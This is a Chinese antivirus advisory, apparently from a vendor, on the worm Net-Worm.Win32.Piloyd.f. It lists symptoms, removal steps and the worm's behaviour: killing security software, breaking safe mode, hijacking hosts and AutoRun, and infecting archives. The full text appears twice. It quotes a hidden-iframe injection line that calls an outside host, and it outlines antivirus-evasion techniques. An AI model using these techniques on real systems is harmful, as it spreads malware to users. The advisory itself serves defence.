“中华吸血鬼”变种

Net-Worm.Win32.Piloyd.f

捕获时间

2010-12-18

危害等级

高

病毒症状

  该样本是使用“Visual C /C”编写的蠕虫程序，由微点主动防御软件自动捕获，采用“UPX”加壳方式试图躲避特征码扫描加壳后的长度为“26,112字节“，图标为“
”，病毒扩展名为“exe”，主要通过“网页挂马”、“文件捆绑”、“下载器下载”、“移动存储介质”等方式传播。病毒主要目的下载病毒木马在本地运行。
   用户中毒后，会出现出现网络运行缓慢， Windows系统无故报错死机，杀软无故退出，无法进入安全模式等现象。

感染对象

Windows 2000/Windows XP/Windows 2003/Windows Vista/ Windows 7

传播途径

移动介质、网页木马、文件捆绑、下载器下载
解决办法：

1.手动删除以下文件：

%SystemRoot%\system32\qmgr.dll
X:\AutoRun.inf
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Ghost.exe  (X为系统各个盘符)

2.手动修复以下注册表键值：

将正常的安全模式注册表值导入到如下位置:
键:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network
键:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal

3. 手动修复以下文件

拷贝正常的hosts文件到: %SystemRoot%\system32\drivers\etc\hosts

变量声明：

　%SystemDriver%　　　　　　  系统所在分区，通常为“C:\”
　%SystemRoot%　　　　　　　  WINDODWS所在目录，通常为“C:\Windows”
　%Documents and Settings%　　用户文档目录，通常为“C:\Documents and Settings”
　%Temp%　　　　　　　　　　  临时文件夹，通常为“C:\Documents and Settings\当前用户名称\Local Settings\Temp”
　%ProgramFiles%　　　　　　　系统程序默认安装目录，通常为：“C:\ProgramFiles”
病毒分析：

1、病毒运行后，查找注册表键HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost,查看netsvcs服务是否开启。
2、如果开启，尝试关闭此服务；如果此服务关闭，则查找查找%SystemRoot%\system32\qmgr.dll，调用sfc_os.#5函数去除系统文件保护，释放病毒文件%SystemRoot%\system32\qmgr.dll，替换系统文件完成自启动。
3、释放%Temp%\Loopt.bat批处理文件，删除病毒源文件。
4、在qmgr.dll中，比较自己是否在360tray.exe中，通过向设备"\\.\360SpShadow0"发送控制码，结束360tray.exe进程。
5、创建线程，循环遍历查找avp.exe、bdagent.exe、360tray.exe进程，如果找到则结束其进程。
6、修改注册表相关键值，禁用任务管理器和禁用显示隐藏文件；并通过删除注册表对应键值破坏安全模式
7、全盘查找后缀名为html、htm、asp、aspx、php、jsp格式的网页文件，如果找到，往目标文件中插入类似<iframe  src=http://www.xx.cn/1.htm width=0 height=0></iframe>的恶意代码，并搜索后缀名为"gho、GHO、Gho"的文件，一旦找到，将其删除。使用户丢失系统备份数据。
8、病毒通过加载系统核心文件NTDLL.DLL，获得相关API函数虚拟地址，操作PhysicalMemory内核对象，并提升权限，从而实现对物理内存的直接读写操作。
9、全盘查找后缀名为rar、zip、tgz、tar的压缩包文件，一旦找到，利用%ProgramFiles%\WinRAR\Rar.exe程序将目标压缩包解压，将病毒程序"安装.bat"复制到解压出来的文件夹中，然后再压缩回去，完成将病毒添加到压缩包的功能
10.释放%Temp%\NtHid.sys驱动文件，创建名称为"NtHid"的服务，恢复SSDT，遍历查找并结束安全软件的进程，删除安全软件的相关文件，最后删除驱动文件 。
11、修改%SystemRoot%\System32\drivers\etc\hosts文件，屏蔽安全厂商网址和百度等网址。
12、开启网络，从指定地址下载大量病毒到本地运行，并统计被感染主机相关信息，将用户机器操作系统,MAC等信息发送到指定网址。
13、在每个盘符下生成文件AutoRun.inf,并创建目录 recycle.{645FF040-5081-101B-9F08-00AA002F954E},释放病毒文件recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Ghost.exe,并设置为隐藏，使用户每次双击磁盘和打开资源管理器时自动运行病毒。

病毒创建文件：

%SystemRoot%\system32\qmgr.dll
%Temp%\Loopt.bat
%Temp%\NtHid.sys
X:\AutoRun.inf
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Ghost.exe  (X为被感染盘符)

病毒创建注册表：

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\下建立大量安全软件的映像劫持
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ NtHid

病毒删除注册表：

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal

病毒删除文件：

%Temp%\NtHid.sys

病毒修改文件：

%SystemRoot%\System32\drivers\etc\hosts

“中华吸血鬼”变种

Net-Worm.Win32.Piloyd.f

捕获时间

2010-12-18

危害等级

高

病毒症状

  该样本是使用“Visual C /C”编写的蠕虫程序，由微点主动防御软件自动捕获，采用“UPX”加壳方式试图躲避特征码扫描加壳后的长度为“26,112字节“，图标为“
”，病毒扩展名为“exe”，主要通过“网页挂马”、“文件捆绑”、“下载器下载”、“移动存储介质”等方式传播。病毒主要目的下载病毒木马在本地运行。
   用户中毒后，会出现出现网络运行缓慢， Windows系统无故报错死机，杀软无故退出，无法进入安全模式等现象。

感染对象

Windows 2000/Windows XP/Windows 2003/Windows Vista/ Windows 7

传播途径

移动介质、网页木马、文件捆绑、下载器下载
解决办法：

1.手动删除以下文件：

%SystemRoot%\system32\qmgr.dll
X:\AutoRun.inf
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Ghost.exe  (X为系统各个盘符)

2.手动修复以下注册表键值：

将正常的安全模式注册表值导入到如下位置:
键:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network
键:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal

3. 手动修复以下文件

拷贝正常的hosts文件到: %SystemRoot%\system32\drivers\etc\hosts

变量声明：

　%SystemDriver%　　　　　　  系统所在分区，通常为“C:\”
　%SystemRoot%　　　　　　　  WINDODWS所在目录，通常为“C:\Windows”
　%Documents and Settings%　　用户文档目录，通常为“C:\Documents and Settings”
　%Temp%　　　　　　　　　　  临时文件夹，通常为“C:\Documents and Settings\当前用户名称\Local Settings\Temp”
　%ProgramFiles%　　　　　　　系统程序默认安装目录，通常为：“C:\ProgramFiles”
病毒分析：

1、病毒运行后，查找注册表键HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost,查看netsvcs服务是否开启。
2、如果开启，尝试关闭此服务；如果此服务关闭，则查找查找%SystemRoot%\system32\qmgr.dll，调用sfc_os.#5函数去除系统文件保护，释放病毒文件%SystemRoot%\system32\qmgr.dll，替换系统文件完成自启动。
3、释放%Temp%\Loopt.bat批处理文件，删除病毒源文件。
4、在qmgr.dll中，比较自己是否在360tray.exe中，通过向设备"\\.\360SpShadow0"发送控制码，结束360tray.exe进程。
5、创建线程，循环遍历查找avp.exe、bdagent.exe、360tray.exe进程，如果找到则结束其进程。
6、修改注册表相关键值，禁用任务管理器和禁用显示隐藏文件；并通过删除注册表对应键值破坏安全模式
7、全盘查找后缀名为html、htm、asp、aspx、php、jsp格式的网页文件，如果找到，往目标文件中插入类似<iframe  src=http://www.xx.cn/1.htm width=0 height=0></iframe>的恶意代码，并搜索后缀名为"gho、GHO、Gho"的文件，一旦找到，将其删除。使用户丢失系统备份数据。
8、病毒通过加载系统核心文件NTDLL.DLL，获得相关API函数虚拟地址，操作PhysicalMemory内核对象，并提升权限，从而实现对物理内存的直接读写操作。
9、全盘查找后缀名为rar、zip、tgz、tar的压缩包文件，一旦找到，利用%ProgramFiles%\WinRAR\Rar.exe程序将目标压缩包解压，将病毒程序"安装.bat"复制到解压出来的文件夹中，然后再压缩回去，完成将病毒添加到压缩包的功能
10.释放%Temp%\NtHid.sys驱动文件，创建名称为"NtHid"的服务，恢复SSDT，遍历查找并结束安全软件的进程，删除安全软件的相关文件，最后删除驱动文件 。
11、修改%SystemRoot%\System32\drivers\etc\hosts文件，屏蔽安全厂商网址和百度等网址。
12、开启网络，从指定地址下载大量病毒到本地运行，并统计被感染主机相关信息，将用户机器操作系统,MAC等信息发送到指定网址。
13、在每个盘符下生成文件AutoRun.inf,并创建目录 recycle.{645FF040-5081-101B-9F08-00AA002F954E},释放病毒文件recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Ghost.exe,并设置为隐藏，使用户每次双击磁盘和打开资源管理器时自动运行病毒。

病毒创建文件：

%SystemRoot%\system32\qmgr.dll
%Temp%\Loopt.bat
%Temp%\NtHid.sys
X:\AutoRun.inf
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Ghost.exe  (X为被感染盘符)

病毒创建注册表：

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\下建立大量安全软件的映像劫持
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ NtHid

病毒删除注册表：

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal

病毒删除文件：

%Temp%\NtHid.sys

病毒修改文件：

%SystemRoot%\System32\drivers\etc\hosts